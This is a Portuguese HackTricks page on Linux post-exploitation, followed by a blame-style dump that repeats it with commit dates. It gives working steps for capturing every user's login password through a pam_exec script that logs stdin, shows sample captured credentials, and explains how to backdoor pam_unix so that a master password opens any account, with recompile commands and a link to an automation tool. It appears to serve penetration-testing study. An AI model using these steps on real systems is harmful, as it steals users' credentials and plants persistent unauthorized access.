hacktricks/linux-hardening/linux-post-exploitation/README.md

# Pós-Exploração do Linux

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!

- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)

- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>

## Sniffing de senhas de login com PAM

Vamos configurar um módulo PAM para registrar cada senha que cada usuário usa para fazer login. Se você não sabe o que é PAM, confira:

{% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
{% endcontent-ref %}

Primeiro, criamos um script bash que será invocado sempre que ocorrer uma nova autenticação.
```bash
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
```
As variáveis são específicas do PAM e estarão disponíveis por meio do módulo `pam_exec.so`.

Aqui está o significado das variáveis:

* **$PAM\_USER:** O nome de usuário que foi inserido.
* **$PAM\_RHOST:** O host remoto (tipicamente o endereço IP)
* **$(cat -):** Isso lê `stdin`, e conterá a senha que o script captura
* Os resultados são redirecionados para um arquivo de log em `/var/log/toomanysecrets.log`

Para **impedir que todos os usuários leiam** o arquivo, considere pré-criá-lo e executar `chmod`, por exemplo:
```bash
sudo touch /var/log/toomanysecrets.sh
sudo chmod 770 /var/log/toomanysecrets.sh
```
Em seguida, o arquivo de configuração do PAM precisa ser atualizado para que o módulo `pam_exec` seja usado para invocar o script.

Existem vários arquivos de configuração localizados em `/etc/pam.d/`, e escolhemos o `common-auth`.
```
sudo nano /etc/pam.d/common-auth
```
Na parte inferior do arquivo, adicione o seguinte módulo de autenticação:

`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`

As opções têm o seguinte significado:

* **optional:** A autenticação não deve falhar se houver um erro (não é uma etapa obrigatória)
* **pam\_exec.so:** Este é o módulo PAM que pode invocar scripts arbitrários
* **expose\_authtok:** Este é o truque que permite ler a senha via `stdin`
* **quiet:** Não mostre nenhum erro ao usuário (se algo não funcionar)
* O último argumento é o script shell que foi criado anteriormente

![](<../../.gitbook/assets/image (375).png>)

Finalmente, torne o arquivo executável:

`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`

Agora, vamos experimentar e fazer ssh de outra máquina ou fazer login localmente.

E então olhe para o arquivo de log:
```
$ sudo cat /var/log/toomanysecrets.log
 Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149
 Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:
 Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149
```
### Backdooring PAM

Vamos para as fontes do PAM (depende da sua distribuição, pegue o mesmo número de versão que a sua...) e procure em torno das linhas 170/180 no arquivo pam\_unix\_auth.c:
```
vi modules/pam_unix/pam_unix_auth.c
```
![](<../../.gitbook/assets/image (651).png>)

Vamos mudar isso para:

![](<../../.gitbook/assets/image (638) (2) (2).png>)

Isso permitirá que qualquer usuário que use a **senha "0xMitsurugi"** faça login.

Recompile o `pam_unix_auth.c` e substitua o arquivo pam\_unix.so:
```bash
make
sudo cp \  
  /home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \  
  /lib/x86_64-linux-gnu/security/  
```
{% hint style="info" %}
Você pode automatizar esse processo com [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)
{% endhint %}

## Referências

* [https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)
* [https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

- Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!

- Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)

- Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)

- **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**

- **Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

</details>
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`# Pós-Exploração do Linux`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`</details>`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Sniffing de senhas de login com PAM`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Vamos configurar um módulo PAM para registrar cada senha que cada usuário usa para fazer login. Se você não sabe o que é PAM, confira:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`{% content-ref url="pam-pluggable-authentication-modules.md" %}`
			`[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)`
			`{% endcontent-ref %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Primeiro, criamos um script bash que será invocado sempre que ocorrer uma nova autenticação.`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			```bash
			`#!/bin/sh`
			`echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			As variáveis são específicas do PAM e estarão disponíveis por meio do módulo `pam_exec.so`.
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Aqui está o significado das variáveis:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* $PAM\_USER: O nome de usuário que foi inserido.`
			`* $PAM\_RHOST: O host remoto (tipicamente o endereço IP)`
			* $(cat -): Isso lê `stdin`, e conterá a senha que o script captura
			* Os resultados são redirecionados para um arquivo de log em `/var/log/toomanysecrets.log`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Para impedir que todos os usuários leiam o arquivo, considere pré-criá-lo e executar `chmod`, por exemplo:
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			```bash
			`sudo touch /var/log/toomanysecrets.sh`
			`sudo chmod 770 /var/log/toomanysecrets.sh`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Em seguida, o arquivo de configuração do PAM precisa ser atualizado para que o módulo `pam_exec` seja usado para invocar o script.
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Existem vários arquivos de configuração localizados em `/etc/pam.d/`, e escolhemos o `common-auth`.
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			```
			`sudo nano /etc/pam.d/common-auth`
			```
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Na parte inferior do arquivo, adicione o seguinte módulo de autenticação:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`auth optional pam_exec.so quiet expose_authtok /usr/local/bin/toomanysecrets.sh`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`As opções têm o seguinte significado:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`* optional: A autenticação não deve falhar se houver um erro (não é uma etapa obrigatória)`
			`* pam\_exec.so: Este é o módulo PAM que pode invocar scripts arbitrários`
			* expose\_authtok: Este é o truque que permite ler a senha via `stdin`
			`* quiet: Não mostre nenhum erro ao usuário (se algo não funcionar)`
			`* O último argumento é o script shell que foi criado anteriormente`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`![](<../../.gitbook/assets/image (375).png>)`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Finalmente, torne o arquivo executável:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`sudo chmod 700 /usr/local/bin/toomanysecrets.sh`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Agora, vamos experimentar e fazer ssh de outra máquina ou fazer login localmente.`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`E então olhe para o arquivo de log:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			```
			`$ sudo cat /var/log/toomanysecrets.log`
			`Sun Jun 26 23:36:37 PDT 2022 tom, Trustno1!, From: 192.168.1.149`
			`Sun Jun 26 23:37:53 PDT 2022 tom, Trustno1!, From:`
			`Sun Jun 26 23:39:12 PDT 2022 tom, Trustno1!, From: 192.168.1.149`
			```
			`### Backdooring PAM`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Vamos para as fontes do PAM (depende da sua distribuição, pegue o mesmo número de versão que a sua...) e procure em torno das linhas 170/180 no arquivo pam\_unix\_auth.c:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			```
			`vi modules/pam_unix/pam_unix_auth.c`
			```
			`![](<../../.gitbook/assets/image (651).png>)`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Vamos mudar isso para:`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
GitBook: [#3332] No subject 2022-07-21 23:50:52 +00:00			`![](<../../.gitbook/assets/image (638) (2) (2).png>)`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Isso permitirá que qualquer usuário que use a senha "0xMitsurugi" faça login.`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			Recompile o `pam_unix_auth.c` e substitua o arquivo pam\_unix.so:
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			```bash
			`make`
			`sudo cp \`
			`/home/mitsurugi/PAM/pam_deb/pam-1.1.8/modules/pam_unix/.libs/pam_unix.so \`
			`/lib/x86_64-linux-gnu/security/`
			```
			`{% hint style="info" %}`
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`Você pode automatizar esse processo com [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00			`{% endhint %}`

Translated to Portuguese 2023-06-06 18:56:34 +00:00			`## Referências`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`* [https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/)`
			`* [https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)`

			`<details>`

update twitter 2023-04-25 18:35:28 +00:00			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Adquira o [swag oficial do PEASS & HackTricks](https://peass.creator-spring.com)`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Junte-se ao [💬](https://emojipedia.org/speech-balloon/) [grupo do Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo do telegram](https://t.me/peass) ou siga-me no Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks_live).`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
Translated to Portuguese 2023-06-06 18:56:34 +00:00			`- Compartilhe suas técnicas de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud).`
GitBook: [#3285] No subject 2022-06-27 08:48:17 +00:00
			`</details>`